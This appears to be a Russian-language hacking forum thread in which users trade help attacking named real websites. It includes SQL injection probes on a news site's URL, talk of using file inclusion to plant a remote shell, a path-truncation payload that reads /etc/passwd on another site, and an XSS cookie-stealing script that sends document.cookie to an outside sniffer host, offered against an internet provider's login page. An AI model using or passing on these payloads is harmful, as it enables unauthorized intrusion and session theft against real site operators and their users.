http://en.isranews.com/index.php?option=com_content&view=category&layout=blog&id=1+AND+1=1/* http://en.isranews.com/index.php?option=com_content&view=category&layout=blog&id=1+AND+1=2/* Скуля ведь? Как раскрутить? Не получается даже узнать версию с помощью подзапросов.
про инклудов прочитал но во многих саитах его зашишают а можно ди с помащю инклуда и налажением шели от другого саита создать папку
Мы тут посовещались с коллегами на ИРЦ (они все как один хакеры) и поняли, что нам ровным счётом ничего не известно про способ "налажением шели от другого саита ". Не мог-бы ты яснее сформулировать вопрос?
AET, напиши по РУССКИ, что ты хочешь??? Залить шелл на свой хост, затем с помощью удалённого инклуда его подключить на бажный сайт и создать папку??
А, "инклудовать"?! Это совсем другое дело. Думаю если у Вас существует возможность "инклудовать свой шелл" , а так-же "на запись в папку правать", то создать папку, либо файл, вполне возможно. Прям из "инклудоваемого" шелла. Единственное, что опять повергает меня в сомнения это фраза "на другую страницу". Дело в том, что этот момент я так и не смог понять, поэтому ответ возможно не полон. PS Простите за грамматику, не вполне ещё освоился с Вашим диалектом
хочу получить доступ к базе!!! Возможно? Как я понял прочитав много инфы о инклуде это локальный инклуд! И с помощью его можно только просматривать файлы с нуливым байтом %00! Но к сожелению у меня и это не проканало! И еже вопрос: Можно ли error include использовать для XSS атаки?
нулл байт скорее всего не проходит по той причине, что magic_quotes_gpc ON, ибо происходит слеширование: Code: Warning: include(./inc/../../../etc/passwd[color="red"]\[/color]0.php)
Onyma Biling Есть ссылка на инет провайдера! https://stat.tvingo.ru/ при вписывании в окно Регистрационное имя xss код '<script>alert(123)</script> Этим можно как нибудь воспользоваться???
2geforce Ты можешь составить запрос: Code: '><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script> (c)Micr0b Для перенаправления куков на сниффер.
Code: http://wow.alania.net/?page=../../etc/passwd%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C Расширение срезалось: Code: Warning: include(./inc/../../etc/passwd<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<&l in Y:\home\78.110.144.12\www\index.php on line 104